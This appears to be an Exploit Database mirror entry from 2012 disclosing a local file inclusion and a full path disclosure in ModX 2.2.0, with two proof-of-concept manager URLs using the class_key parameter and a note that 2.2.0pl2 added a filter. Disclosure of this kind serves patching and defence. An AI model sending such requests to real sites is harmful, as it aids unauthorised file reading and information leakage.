ModX 2.2.0 – Multiple Vulnerabilities

• Exploit Database
• 20 阅读

• 作者： n0tch
  日期： 2012-03-14
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/18593/

• # Exploit Title: Modx 2.2.0 LFI and Full Path Disclosure
  # Google Dork: [if relevant](we will automatically add these to the GHDB)
  # Date: 13/03/2012
  # Author: n0tch aka andmuchmore
  # Software Link: http://modx.com/download/
  # Version: 2.2.0
  # Tested on:Windows XP/ Windows 7 / Ubuntu
  
  
  +[-- LFI --]+
  
  http://localhost/cms/manager/?a=55&class_key=
  
  ** Filter added in 2.2.0pl2 **
  
  
  +[-- FPD --]+
  
  http://localhost/cms/manager/?a=55&class_key=somefilethatdoesntexsist
  
  +[-- Shoutz --]+
  
  All the belegit crew..